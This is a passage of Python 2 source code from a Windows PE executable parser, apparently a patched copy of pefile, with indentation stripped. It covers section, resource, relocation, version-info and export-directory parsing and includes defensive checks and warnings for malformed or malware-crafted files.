for idx, c in enumerate(entry):
if ord(c) > 256:
l.extend( [chr(ord(c) & 0xff), chr( (ord(c) & 0xff00) >>8) ] )
else:
l.extend( [chr(ord(c)), '\0'] )
file_data[offsets[1]:offsets[1]+len(entry)*2] = l
remainder = lengths[1] - len(entry)
start = offsets[1] + len(entry)*2
end = offsets[1] + lengths[1]*2
file_data[start:end] = [u'\0'] * remainder*2
if is_bytearray_available():
new_file_data = ''.join( chr(c) for c in file_data )
else:
new_file_data = ''.join( [ chr(ord(c)) for c in file_data] )
if filename:
f = file(filename, 'wb+')
f.write(new_file_data)
f.close()
else:
return new_file_data
def parse_sections(self, offset):
"""Fetch the PE file sections.
The sections will be readily available in the "sections" attribute.
Its attributes will contain all the section information plus "data"
a buffer containing the section's data.
The "Characteristics" member will be processed and attributes
representing the section characteristics (with the 'IMAGE_SCN_'
string trimmed from the constant's names) will be added to the
section instance.
Refer to the SectionStructure class for additional info.
"""
self.sections = []
MAX_SIMULTANEOUS_ERRORS = 3
for i in xrange(self.FILE_HEADER.NumberOfSections):
simultaneous_errors = 0
section = SectionStructure( self.__IMAGE_SECTION_HEADER_format__, pe=self )
if not section:
break
section_offset = offset + section.sizeof() * i
section.set_file_offset(section_offset)
section_data = self.__data__[section_offset : section_offset + section.sizeof()]
# Check if the section is all nulls and stop if so.
if section_data.count('\0') == section.sizeof():
self.__warnings.append(
('Invalid section %d. ' % i) +
'Contents are null-bytes.')
break
if len(section_data) == 0:
self.__warnings.append(
('Invalid section %d. ' % i) +
'No data in the file (is this corkami\'s virtsectblXP?).')
break
section.__unpack__(section_data)
self.__structures__.append(section)
if section.SizeOfRawData+section.PointerToRawData > len(self.__data__):
simultaneous_errors += 1
self.__warnings.append(
('Error parsing section %d. ' % i) +
'SizeOfRawData is larger than file.')
if self.adjust_FileAlignment( section.PointerToRawData,
self.OPTIONAL_HEADER.FileAlignment ) > len(self.__data__):
simultaneous_errors += 1
self.__warnings.append(
('Error parsing section %d. ' % i) +
'PointerToRawData points beyond the end of the file.')
if section.Misc_VirtualSize > 0x10000000:
simultaneous_errors += 1
self.__warnings.append(
('Suspicious value found parsing section %d. ' % i) +
'VirtualSize is extremely large > 256MiB.')
if self.adjust_SectionAlignment( section.VirtualAddress,
self.OPTIONAL_HEADER.SectionAlignment, self.OPTIONAL_HEADER.FileAlignment ) > 0x10000000:
simultaneous_errors += 1
self.__warnings.append(
('Suspicious value found parsing section %d. ' % i) +
'VirtualAddress is beyond 0x10000000.')
if ( self.OPTIONAL_HEADER.FileAlignment != 0 and
( section.PointerToRawData % self.OPTIONAL_HEADER.FileAlignment) != 0):
simultaneous_errors += 1
self.__warnings.append(
('Error parsing section %d. ' % i) +
'PointerToRawData should normally be ' +
'a multiple of FileAlignment, this might imply the file ' +
'is trying to confuse tools which parse this incorrectly.')
if simultaneous_errors >= MAX_SIMULTANEOUS_ERRORS:
self.__warnings.append('Too many warnings parsing section. Aborting.')
break
section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
# Set the section's flags according to the Characteristics member
set_flags(section, section.Characteristics, section_flags)
if ( section.__dict__.get('IMAGE_SCN_MEM_WRITE', False) and
section.__dict__.get('IMAGE_SCN_MEM_EXECUTE', False) ):
if section.Name == 'PAGE' and self.is_driver():
# Drivers can have a PAGE section with those flags set without
# implying that it is malicious
pass
else:
self.__warnings.append(
('Suspicious flags set for section %d. ' % i) +
'Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set. ' +
'This might indicate a packed executable.')
self.sections.append(section)
# Sort the sections by their VirtualAddress and add a field to each of them
# with the VirtualAddress of the next section. This will allow to check
# for potentially overlapping sections in badly constructed PEs.
self.sections.sort(cmp=lambda a,b: cmp(a.VirtualAddress, b.VirtualAddress))
for idx, section in enumerate(self.sections):
if idx == len(self.sections)-1:
section.next_section_virtual_address = None
else:
section.next_section_virtual_address = self.sections[idx+1].VirtualAddress
if self.FILE_HEADER.NumberOfSections > 0 and self.sections:
return offset + self.sections[0].sizeof()*self.FILE_HEADER.NumberOfSections
else:
return offset
def parse_data_directories(self, directories=None):
"""Parse and process the PE file's data directories.
If the optional argument 'directories' is given, only
the directories at the specified indexes will be parsed.
Such functionality allows parsing of areas of interest
without the burden of having to parse all others.
The directories can then be specified as:
For export / import only:
directories = [ 0, 1 ]
or (more verbosely):
directories = [ DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT'],
DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_EXPORT'] ]
If 'directories' is a list, the ones that are processed will be removed,
leaving only the ones that are not present in the image.
"""
directory_parsing = (
('IMAGE_DIRECTORY_ENTRY_IMPORT', self.parse_import_directory),
('IMAGE_DIRECTORY_ENTRY_EXPORT', self.parse_export_directory),
('IMAGE_DIRECTORY_ENTRY_RESOURCE', self.parse_resources_directory),
('IMAGE_DIRECTORY_ENTRY_DEBUG', self.parse_debug_directory),
('IMAGE_DIRECTORY_ENTRY_BASERELOC', self.parse_relocations_directory),
('IMAGE_DIRECTORY_ENTRY_TLS', self.parse_directory_tls),
('IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG', self.parse_directory_load_config),
('IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT', self.parse_delay_import_directory),
('IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT', self.parse_directory_bound_imports) )
if directories is not None:
if not isinstance(directories, (tuple, list)):
directories = [directories]
for entry in directory_parsing:
# OC Patch:
#
try:
directory_index = DIRECTORY_ENTRY[entry[0]]
dir_entry = self.OPTIONAL_HEADER.DATA_DIRECTORY[directory_index]
except IndexError:
break
# Only process all the directories if no individual ones have
# been chosen
#
if directories is None or directory_index in directories:
if dir_entry.VirtualAddress:
value = entry[1](dir_entry.VirtualAddress, dir_entry.Size)
if value:
setattr(self, entry[0][6:], value)
if (directories is not None) and isinstance(directories, list) and (directory_index in directories):
directories.remove(directory_index)
def parse_directory_bound_imports(self, rva, size):
""""""
bnd_descr = Structure(self.__IMAGE_BOUND_IMPORT_DESCRIPTOR_format__)
bnd_descr_size = bnd_descr.sizeof()
start = rva
bound_imports = []
while True:
bnd_descr = self.__unpack_data__(
self.__IMAGE_BOUND_IMPORT_DESCRIPTOR_format__,
self.__data__[rva:rva+bnd_descr_size],
file_offset = rva)
if bnd_descr is None:
# If the directory can't be parsed, silently return.
# This directory does not need to be valid for the
# PE file itself to be valid.
self.__warnings.append(
'The Bound Imports directory exists but can\'t be parsed.')
return
if bnd_descr.all_zeroes():
break
rva += bnd_descr.sizeof()
section = self.get_section_by_offset(rva)
file_offset = self.get_offset_from_rva(rva)
if section is None:
safety_boundary = len(self.__data__) - file_offset
sections_after_offset = [section.PointerToRawData for section in self.sections
if section.PointerToRawData > file_offset]
if sections_after_offset:
# Find the first section starting at a later offset than that specified by 'rva'
first_section_after_offset = min(sections_after_offset)
section = self.get_section_by_offset(first_section_after_offset)
if section is not None:
safety_boundary = section.PointerToRawData - file_offset
else:
safety_boundary = section.PointerToRawData + len(section.get_data()) - file_offset
if not section:
self.__warnings.append(
'RVA of IMAGE_BOUND_IMPORT_DESCRIPTOR points to an invalid address: %x' %
rva)
return
forwarder_refs = []
# 8 is the size of __IMAGE_BOUND_IMPORT_DESCRIPTOR_format__
for idx in xrange( min( bnd_descr.NumberOfModuleForwarderRefs, safety_boundary/8) ):
# Both structures IMAGE_BOUND_IMPORT_DESCRIPTOR and
# IMAGE_BOUND_FORWARDER_REF have the same size.
bnd_frwd_ref = self.__unpack_data__(
self.__IMAGE_BOUND_FORWARDER_REF_format__,
self.__data__[rva:rva+bnd_descr_size],
file_offset = rva)
# OC Patch:
if not bnd_frwd_ref:
raise PEFormatError(
"IMAGE_BOUND_FORWARDER_REF cannot be read")
rva += bnd_frwd_ref.sizeof()
offset = start+bnd_frwd_ref.OffsetModuleName
name_str = self.get_string_from_data(
0, self.__data__[offset : offset + MAX_STRING_LENGTH])
# OffsetModuleName points to a DLL name. These shouldn't be too long.
# Anything longer than a safety length of 256 will be taken to indicate
# a corrupt entry, aborting the processing of these entries.
# Names shorter than 4 characters will be taken as invalid as well.
if name_str:
invalid_chars = [c for c in name_str if c not in string.printable]
if len(name_str) > 256 or len(name_str) < 4 or invalid_chars:
break
forwarder_refs.append(BoundImportRefData(
struct = bnd_frwd_ref,
name = name_str))
offset = start+bnd_descr.OffsetModuleName
name_str = self.get_string_from_data(
0, self.__data__[offset : offset + MAX_STRING_LENGTH])
if name_str:
invalid_chars = [c for c in name_str if c not in string.printable]
if len(name_str) > 256 or len(name_str) < 4 or invalid_chars:
break
if not name_str:
break
bound_imports.append(
BoundImportDescData(
struct = bnd_descr,
name = name_str,
entries = forwarder_refs))
return bound_imports
def parse_directory_tls(self, rva, size):
""""""
if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
format = self.__IMAGE_TLS_DIRECTORY_format__
elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
format = self.__IMAGE_TLS_DIRECTORY64_format__
try:
tls_struct = self.__unpack_data__(
format,
self.get_data( rva, Structure(format).sizeof() ),
file_offset = self.get_offset_from_rva(rva))
except PEFormatError:
self.__warnings.append(
'Invalid TLS information. Can\'t read ' +
'data at RVA: 0x%x' % rva)
tls_struct = None
if not tls_struct:
return None
return TlsData( struct = tls_struct )
def parse_directory_load_config(self, rva, size):
""""""
if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
format = self.__IMAGE_LOAD_CONFIG_DIRECTORY_format__
elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
format = self.__IMAGE_LOAD_CONFIG_DIRECTORY64_format__
try:
load_config_struct = self.__unpack_data__(
format,
self.get_data( rva, Structure(format).sizeof() ),
file_offset = self.get_offset_from_rva(rva))
except PEFormatError:
self.__warnings.append(
'Invalid LOAD_CONFIG information. Can\'t read ' +
'data at RVA: 0x%x' % rva)
load_config_struct = None
if not load_config_struct:
return None
return LoadConfigData( struct = load_config_struct )
def parse_relocations_directory(self, rva, size):
""""""
rlc_size = Structure(self.__IMAGE_BASE_RELOCATION_format__).sizeof()
end = rva+size
relocations = []
while rva < end:
# OC Patch:
# Malware that has bad RVA entries will cause an error.
# Just continue on after an exception
#
try:
rlc = self.__unpack_data__(
self.__IMAGE_BASE_RELOCATION_format__,
self.get_data(rva, rlc_size),
file_offset = self.get_offset_from_rva(rva) )
except PEFormatError:
self.__warnings.append(
'Invalid relocation information. Can\'t read ' +
'data at RVA: 0x%x' % rva)
rlc = None
if not rlc:
break
# rlc.VirtualAddress must lie within the Image
if rlc.VirtualAddress > self.OPTIONAL_HEADER.SizeOfImage:
self.__warnings.append(
'Invalid relocation information. VirtualAddress outside' +
' of Image: 0x%x' % rlc.VirtualAddress)
break
# rlc.SizeOfBlock must be less or equal than the size of the image
# (It's a rather loose sanity test)
if rlc.SizeOfBlock > self.OPTIONAL_HEADER.SizeOfImage:
self.__warnings.append(
'Invalid relocation information. SizeOfBlock too large' +
': %d' % rlc.SizeOfBlock)
break
reloc_entries = self.parse_relocations(
rva+rlc_size, rlc.VirtualAddress, rlc.SizeOfBlock-rlc_size )
relocations.append(
BaseRelocationData(
struct = rlc,
entries = reloc_entries))
if not rlc.SizeOfBlock:
break
rva += rlc.SizeOfBlock
return relocations
def parse_relocations(self, data_rva, rva, size):
""""""
try:
data = self.get_data(data_rva, size)
file_offset = self.get_offset_from_rva(data_rva)
except PEFormatError, excp:
self.__warnings.append(
'Bad RVA in relocation data: 0x%x' % (data_rva))
return []
entries = []
offsets_and_type = []
for idx in xrange( len(data) / 2 ):
entry = self.__unpack_data__(
self.__IMAGE_BASE_RELOCATION_ENTRY_format__,
data[idx*2:(idx+1)*2],
file_offset = file_offset )
if not entry:
break
word = entry.Data
reloc_type = (word>>12)
reloc_offset = (word & 0x0fff)
if (reloc_offset, reloc_type) in offsets_and_type:
self.__warnings.append(
'Overlapping offsets in relocation data ' +
'data at RVA: 0x%x' % (reloc_offset+rva))
break
if len(offsets_and_type) >= 1000:
offsets_and_type.pop()
offsets_and_type.insert(0, (reloc_offset, reloc_type))
entries.append(
RelocationData(
struct = entry,
type = reloc_type,
base_rva = rva,
rva = reloc_offset+rva))
file_offset += entry.sizeof()
return entries
def parse_debug_directory(self, rva, size):
""""""
dbg_size = Structure(self.__IMAGE_DEBUG_DIRECTORY_format__).sizeof()
debug = []
for idx in xrange(size/dbg_size):
try:
data = self.get_data(rva+dbg_size*idx, dbg_size)
except PEFormatError, e:
self.__warnings.append(
'Invalid debug information. Can\'t read ' +
'data at RVA: 0x%x' % rva)
return None
dbg = self.__unpack_data__(
self.__IMAGE_DEBUG_DIRECTORY_format__,
data, file_offset = self.get_offset_from_rva(rva+dbg_size*idx))
if not dbg:
return None
debug.append(
DebugData(
struct = dbg))
return debug
def parse_resources_directory(self, rva, size=0, base_rva = None, level = 0, dirs=None):
"""Parse the resources directory.
Given the RVA of the resources directory, it will process all
its entries.
The root will have the corresponding member of its structure,
IMAGE_RESOURCE_DIRECTORY plus 'entries', a list of all the
entries in the directory.
Those entries will have, correspondingly, all the structure's
members (IMAGE_RESOURCE_DIRECTORY_ENTRY) and an additional one,
"directory", pointing to the IMAGE_RESOURCE_DIRECTORY structure
representing upper layers of the tree. This one will also have
an 'entries' attribute, pointing to the 3rd, and last, level.
Another directory with more entries. Those last entries will
have a new attribute (either 'leaf' or 'data_entry' can be used to
access it). This structure finally points to the resource data.
All the members of this structure, IMAGE_RESOURCE_DATA_ENTRY,
are available as its attributes.
"""
# OC Patch:
if dirs is None:
dirs = [rva]
if base_rva is None:
base_rva = rva
resources_section = self.get_section_by_rva(rva)
try:
# If the RVA is invalid everything would blow up. Some EXEs seem to be
# especially nasty and have an invalid RVA.
data = self.get_data(rva, Structure(self.__IMAGE_RESOURCE_DIRECTORY_format__).sizeof() )
except PEFormatError, e:
self.__warnings.append(
'Invalid resources directory. Can\'t read ' +
'directory data at RVA: 0x%x' % rva)
return None
# Get the resource directory structure, that is, the header
# of the table preceding the actual entries
#
resource_dir = self.__unpack_data__(
self.__IMAGE_RESOURCE_DIRECTORY_format__, data,
file_offset = self.get_offset_from_rva(rva) )
if resource_dir is None:
# If the resources directory can't be parsed, silently return.
# This directory does not need to be valid for the
# PE file itself to be valid.
self.__warnings.append(
'Invalid resources directory. Can\'t parse ' +
'directory data at RVA: 0x%x' % rva)
return None
dir_entries = []
# Advance the RVA to the position immediately following the directory
# table header and pointing to the first entry in the table
#
rva += resource_dir.sizeof()
number_of_entries = (
resource_dir.NumberOfNamedEntries +
resource_dir.NumberOfIdEntries )
# Set a hard limit on the maximum reasonable number of entries
MAX_ALLOWED_ENTRIES = 4096
if number_of_entries > MAX_ALLOWED_ENTRIES:
self.__warnings.append(
'Error parsing the resources directory. '
'The directory contains %d entries (>%s)' %
(number_of_entries, MAX_ALLOWED_ENTRIES) )
return None
strings_to_postprocess = list()
# Keep track of the last name's start and end offsets in order
# to be able to detect overlapping entries that might suggest
# an invalid or corrupt directory.
last_name_begin_end = None
for idx in xrange(number_of_entries):
res = self.parse_resource_entry(rva)
if res is None:
self.__warnings.append(
'Error parsing the resources directory, '
'Entry %d is invalid, RVA = 0x%x. ' %
(idx, rva) )
break
entry_name = None
entry_id = None
name_is_string = (res.Name & 0x80000000L) >> 31
if not name_is_string:
entry_id = res.Name
else:
ustr_offset = base_rva+res.NameOffset
try:
entry_name = UnicodeStringWrapperPostProcessor(self, ustr_offset)
# If the last entry's offset points before the current's but its end
# is past the current's beginning, assume the overlap indicates a
# corrupt name.
if last_name_begin_end and (last_name_begin_end[0] < ustr_offset and
last_name_begin_end[1] >= ustr_offset):
# Remove the previous overlapping entry as it's likely to be already corrupt data.
strings_to_postprocess.pop()
self.__warnings.append(
'Error parsing the resources directory, '
'attempting to read entry name. '
'Entry names overlap 0x%x' %
(ustr_offset) )
break
last_name_begin_end = (ustr_offset, ustr_offset+entry_name.get_pascal_16_length())
strings_to_postprocess.append(entry_name)
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the resources directory, '
'attempting to read entry name. '
'Can\'t read unicode string at offset 0x%x' %
(ustr_offset) )
if res.DataIsDirectory:
# OC Patch:
#
# One trick malware can do is to recursively reference
# the next directory. This causes hilarity to ensue when
# trying to parse everything correctly.
# If the original RVA given to this function is equal to
# the next one to parse, we assume that it's a trick.
# Instead of raising a PEFormatError this would skip some
# reasonable data so we just break.
#
# 9ee4d0a0caf095314fd7041a3e4404dc is the offending sample
if (base_rva + res.OffsetToDirectory) in dirs:
break
else:
entry_directory = self.parse_resources_directory(
base_rva+res.OffsetToDirectory,
size-(rva-base_rva), # size
base_rva=base_rva, level = level+1,
dirs=dirs + [base_rva + res.OffsetToDirectory])
if not entry_directory:
break
# Ange Albertini's code to process resources' strings
#
strings = None
if entry_id == RESOURCE_TYPE['RT_STRING']:
strings = dict()
for resource_id in entry_directory.entries:
if hasattr(resource_id, 'directory'):
resource_strings = dict()
for resource_lang in resource_id.directory.entries:
if (resource_lang is None or not hasattr(resource_lang, 'data') or
resource_lang.data.struct.Size is None or resource_id.id is None):
continue
string_entry_rva = resource_lang.data.struct.OffsetToData
string_entry_size = resource_lang.data.struct.Size
string_entry_id = resource_id.id
string_entry_data = self.get_data(string_entry_rva, string_entry_size)
parse_strings( string_entry_data, (int(string_entry_id) - 1) * 16, resource_strings )
strings.update(resource_strings)
resource_id.directory.strings = resource_strings
dir_entries.append(
ResourceDirEntryData(
struct = res,
name = entry_name,
id = entry_id,
directory = entry_directory))
else:
struct = self.parse_resource_data_entry(
base_rva + res.OffsetToDirectory)
if struct:
entry_data = ResourceDataEntryData(
struct = struct,
lang = res.Name & 0x3ff,
sublang = res.Name >> 10 )
dir_entries.append(
ResourceDirEntryData(
struct = res,
name = entry_name,
id = entry_id,
data = entry_data))
else:
break
# Check if this entry contains version information
#
if level == 0 and res.Id == RESOURCE_TYPE['RT_VERSION']:
if len(dir_entries)>0:
last_entry = dir_entries[-1]
rt_version_struct = None
try:
rt_version_struct = last_entry.directory.entries[0].directory.entries[0].data.struct
except:
# Maybe a malformed directory structure...?
# Lets ignore it
pass
if rt_version_struct is not None:
self.parse_version_information(rt_version_struct)
rva += res.sizeof()
string_rvas = [s.get_rva() for s in strings_to_postprocess]
string_rvas.sort()
for idx, s in enumerate(strings_to_postprocess):
s.render_pascal_16()
resource_directory_data = ResourceDirData(
struct = resource_dir,
entries = dir_entries)
return resource_directory_data
def parse_resource_data_entry(self, rva):
"""Parse a data entry from the resources directory."""
try:
# If the RVA is invalid everything would blow up. Some EXEs seem to be
# especially nasty and have an invalid RVA.
data = self.get_data(rva, Structure(self.__IMAGE_RESOURCE_DATA_ENTRY_format__).sizeof() )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing a resource directory data entry, ' +
'the RVA is invalid: 0x%x' % ( rva ) )
return None
data_entry = self.__unpack_data__(
self.__IMAGE_RESOURCE_DATA_ENTRY_format__, data,
file_offset = self.get_offset_from_rva(rva) )
return data_entry
def parse_resource_entry(self, rva):
"""Parse a directory entry from the resources directory."""
try:
data = self.get_data( rva, Structure(self.__IMAGE_RESOURCE_DIRECTORY_ENTRY_format__).sizeof() )
except PEFormatError, excp:
# A warning will be added by the caller if this method returns None
return None
resource = self.__unpack_data__(
self.__IMAGE_RESOURCE_DIRECTORY_ENTRY_format__, data,
file_offset = self.get_offset_from_rva(rva) )
if resource is None:
return None
#resource.NameIsString = (resource.Name & 0x80000000L) >> 31
resource.NameOffset = resource.Name & 0x7FFFFFFFL
resource.__pad = resource.Name & 0xFFFF0000L
resource.Id = resource.Name & 0x0000FFFFL
resource.DataIsDirectory = (resource.OffsetToData & 0x80000000L) >> 31
resource.OffsetToDirectory = resource.OffsetToData & 0x7FFFFFFFL
return resource
def parse_version_information(self, version_struct):
"""Parse version information structure.
The data will be made available in three attributes of the PE object.
VS_VERSIONINFO will contain the first three fields of the main structure:
'Length', 'ValueLength', and 'Type'
VS_FIXEDFILEINFO will hold the rest of the fields, accessible as sub-attributes:
'Signature', 'StrucVersion', 'FileVersionMS', 'FileVersionLS',
'ProductVersionMS', 'ProductVersionLS', 'FileFlagsMask', 'FileFlags',
'FileOS', 'FileType', 'FileSubtype', 'FileDateMS', 'FileDateLS'
FileInfo is a list of all StringFileInfo and VarFileInfo structures.
StringFileInfo structures will have a list as an attribute named 'StringTable'
containing all the StringTable structures. Each of those structures contains a
dictionary 'entries' with all the key / value version information string pairs.
VarFileInfo structures will have a list as an attribute named 'Var' containing
all Var structures. Each Var structure will have a dictionary as an attribute
named 'entry' which will contain the name and value of the Var.
"""
# Retrieve the data for the version info resource
#
start_offset = self.get_offset_from_rva( version_struct.OffsetToData )
raw_data = self.__data__[ start_offset : start_offset+version_struct.Size ]
# Map the main structure and the subsequent string
#
versioninfo_struct = self.__unpack_data__(
self.__VS_VERSIONINFO_format__, raw_data,
file_offset = start_offset )
if versioninfo_struct is None:
return
ustr_offset = version_struct.OffsetToData + versioninfo_struct.sizeof()
try:
versioninfo_string = self.get_string_u_at_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read VS_VERSION_INFO string. Can\'t ' +
'read unicode string at offset 0x%x' % (
ustr_offset ) )
versioninfo_string = None
# If the structure does not contain the expected name, it's assumed to be invalid
#
if versioninfo_string != u'VS_VERSION_INFO':
self.__warnings.append('Invalid VS_VERSION_INFO block')
return
# Set the PE object's VS_VERSIONINFO to this one
#
self.VS_VERSIONINFO = versioninfo_struct
# Set the Key attribute to point to the unicode string identifying the structure
#
self.VS_VERSIONINFO.Key = versioninfo_string
# Process the fixed version information, get the offset and structure
#
fixedfileinfo_offset = self.dword_align(
versioninfo_struct.sizeof() + 2 * (len(versioninfo_string) + 1),
version_struct.OffsetToData)
fixedfileinfo_struct = self.__unpack_data__(
self.__VS_FIXEDFILEINFO_format__,
raw_data[fixedfileinfo_offset:],
file_offset = start_offset+fixedfileinfo_offset )
if not fixedfileinfo_struct:
return
# Set the PE object's VS_FIXEDFILEINFO to this one
#
self.VS_FIXEDFILEINFO = fixedfileinfo_struct
# Start parsing all the StringFileInfo and VarFileInfo structures
#
# Get the first one
#
stringfileinfo_offset = self.dword_align(
fixedfileinfo_offset + fixedfileinfo_struct.sizeof(),
version_struct.OffsetToData)
original_stringfileinfo_offset = stringfileinfo_offset
# Set the PE object's attribute that will contain them all.
#
self.FileInfo = list()
while True:
# Process the StringFileInfo/VarFileInfo structure
#
stringfileinfo_struct = self.__unpack_data__(
self.__StringFileInfo_format__,
raw_data[stringfileinfo_offset:],
file_offset = start_offset+stringfileinfo_offset )
if stringfileinfo_struct is None:
self.__warnings.append(
'Error parsing StringFileInfo/VarFileInfo struct' )
return None
# Get the subsequent string defining the structure.
#
ustr_offset = ( version_struct.OffsetToData +
stringfileinfo_offset + versioninfo_struct.sizeof() )
try:
stringfileinfo_string = self.get_string_u_at_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read StringFileInfo string. Can\'t ' +
'read unicode string at offset 0x%x' % ( ustr_offset ) )
break
# Set such string as the Key attribute
#
stringfileinfo_struct.Key = stringfileinfo_string
# Append the structure to the PE object's list
#
self.FileInfo.append(stringfileinfo_struct)
# Parse a StringFileInfo entry
#
if stringfileinfo_string and stringfileinfo_string.startswith(u'StringFileInfo'):
if stringfileinfo_struct.Type in (0,1) and stringfileinfo_struct.ValueLength == 0:
stringtable_offset = self.dword_align(
stringfileinfo_offset + stringfileinfo_struct.sizeof() +
2*(len(stringfileinfo_string)+1),
version_struct.OffsetToData)
stringfileinfo_struct.StringTable = list()
# Process the String Table entries
#
while True:
stringtable_struct = self.__unpack_data__(
self.__StringTable_format__,
raw_data[stringtable_offset:],
file_offset = start_offset+stringtable_offset )
if not stringtable_struct:
break
ustr_offset = ( version_struct.OffsetToData + stringtable_offset +
stringtable_struct.sizeof() )
try:
stringtable_string = self.get_string_u_at_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read StringTable string. Can\'t ' +
'read unicode string at offset 0x%x' % ( ustr_offset ) )
break
stringtable_struct.LangID = stringtable_string
stringtable_struct.entries = dict()
stringtable_struct.entries_offsets = dict()
stringtable_struct.entries_lengths = dict()
stringfileinfo_struct.StringTable.append(stringtable_struct)
entry_offset = self.dword_align(
stringtable_offset + stringtable_struct.sizeof() +
2*(len(stringtable_string)+1),
version_struct.OffsetToData)
# Process all entries in the string table
#
while entry_offset < stringtable_offset + stringtable_struct.Length:
string_struct = self.__unpack_data__(
self.__String_format__, raw_data[entry_offset:],
file_offset = start_offset+entry_offset )
if not string_struct:
break
ustr_offset = ( version_struct.OffsetToData + entry_offset +
string_struct.sizeof() )
try:
key = self.get_string_u_at_rva( ustr_offset )
key_offset = self.get_offset_from_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read StringTable Key string. Can\'t ' +
'read unicode string at offset 0x%x' % ( ustr_offset ) )
break
value_offset = self.dword_align(
2*(len(key)+1) + entry_offset + string_struct.sizeof(),
version_struct.OffsetToData)
ustr_offset = version_struct.OffsetToData + value_offset
try:
value = self.get_string_u_at_rva( ustr_offset,
max_length = string_struct.ValueLength )
value_offset = self.get_offset_from_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read StringTable Value string. ' +
'Can\'t read unicode string at offset 0x%x' % (
ustr_offset ) )
break
if string_struct.Length == 0:
entry_offset = stringtable_offset + stringtable_struct.Length
else:
entry_offset = self.dword_align(
string_struct.Length+entry_offset, version_struct.OffsetToData)
key_as_char = []
for c in key:
if ord(c) >= 0x80:
key_as_char.append('\\x%02x' % ord(c))
else:
key_as_char.append(c)
key_as_char = ''.join(key_as_char)
stringtable_struct.entries[key] = value
stringtable_struct.entries_offsets[key] = (key_offset, value_offset)
stringtable_struct.entries_lengths[key] = (len(key), len(value))
new_stringtable_offset = self.dword_align(
stringtable_struct.Length + stringtable_offset,
version_struct.OffsetToData)
# check if the entry is crafted in a way that would lead to an infinite
# loop and break if so
#
if new_stringtable_offset == stringtable_offset:
break
stringtable_offset = new_stringtable_offset
if stringtable_offset >= stringfileinfo_struct.Length:
break
# Parse a VarFileInfo entry
#
elif stringfileinfo_string and stringfileinfo_string.startswith( u'VarFileInfo' ):
varfileinfo_struct = stringfileinfo_struct
varfileinfo_struct.name = 'VarFileInfo'
if varfileinfo_struct.Type in (0, 1) and varfileinfo_struct.ValueLength == 0:
var_offset = self.dword_align(
stringfileinfo_offset + varfileinfo_struct.sizeof() +
2*(len(stringfileinfo_string)+1),
version_struct.OffsetToData)
varfileinfo_struct.Var = list()
# Process all entries
#
while True:
var_struct = self.__unpack_data__(
self.__Var_format__,
raw_data[var_offset:],
file_offset = start_offset+var_offset )
if not var_struct:
break
ustr_offset = ( version_struct.OffsetToData + var_offset +
var_struct.sizeof() )
try:
var_string = self.get_string_u_at_rva( ustr_offset )
except PEFormatError, excp:
self.__warnings.append(
'Error parsing the version information, ' +
'attempting to read VarFileInfo Var string. ' +
'Can\'t read unicode string at offset 0x%x' % (ustr_offset))
break
if var_string is None:
break
varfileinfo_struct.Var.append(var_struct)
varword_offset = self.dword_align(
2*(len(var_string)+1) + var_offset + var_struct.sizeof(),
version_struct.OffsetToData)
orig_varword_offset = varword_offset
while varword_offset < orig_varword_offset + var_struct.ValueLength:
word1 = self.get_word_from_data(
raw_data[varword_offset:varword_offset+2], 0)
word2 = self.get_word_from_data(
raw_data[varword_offset+2:varword_offset+4], 0)
varword_offset += 4
if isinstance(word1, (int, long)) and isinstance(word2, (int, long)):
var_struct.entry = {var_string: '0x%04x 0x%04x' % (word1, word2)}
var_offset = self.dword_align(
var_offset+var_struct.Length, version_struct.OffsetToData)
if var_offset <= var_offset+var_struct.Length:
break
# Increment and align the offset
#
stringfileinfo_offset = self.dword_align(
stringfileinfo_struct.Length+stringfileinfo_offset,
version_struct.OffsetToData)
# Check if all the StringFileInfo and VarFileInfo items have been processed
#
if stringfileinfo_struct.Length == 0 or stringfileinfo_offset >= versioninfo_struct.Length:
break
def parse_export_directory(self, rva, size):
"""Parse the export directory.
Given the RVA of the export directory, it will process all
its entries.
The exports will be made available as a list of ExportData
instances in the 'DIRECTORY_ENTRY_EXPORT' PE attribute.
"""
try:
export_dir = self.__unpack_data__(
self.__IMAGE_EXPORT_DIRECTORY_format__,
self.get_data( rva, Structure(self.__IMAGE_EXPORT_DIRECTORY_format__).sizeof() ),
file_offset = self.get_offset_from_rva(rva) )
except PEFormatError:
self.__warnings.append(
'Error parsing export directory at RVA: 0x%x' % ( rva ) )
return
if not export_dir:
return
# We keep track of the bytes left in the file and use it to set an upper
# bound on the number of items that can be read from the different
# arrays
#
def length_until_eof(rva):
return len(self.__data__) - self.get_offset_from_rva(rva)
try:
address_of_names = self.get_data(
export_dir.AddressOfNames, min( length_until_eof(export_dir.AddressOfNames), export_dir.NumberOfNames*4))
address_of_name_ordinals = self.get_data(
export_dir.AddressOfNameOrdinals, min( length_until_eof(export_dir.AddressOfNameOrdinals), export_dir.NumberOfNames*4) )
address_of_functions = self.get_data(
export_dir.AddressOfFunctions, min( length_until_eof(export_dir.AddressOfFunctions), export_dir.NumberOfFunctions*4) )
except PEFormatError:
self.__warnings.append(
'Error parsing export directory at RVA: 0x%x' % ( rva ) )
return
exports = []
max_failed_entries_before_giving_up = 10
section = self.get_section_by_rva(export_dir.AddressOfNames)
if not section:
self.__warnings.append(
'RVA AddressOfNames in the export directory points to an invalid address: %x' %
export_dir.AddressOfNames)
return
else:
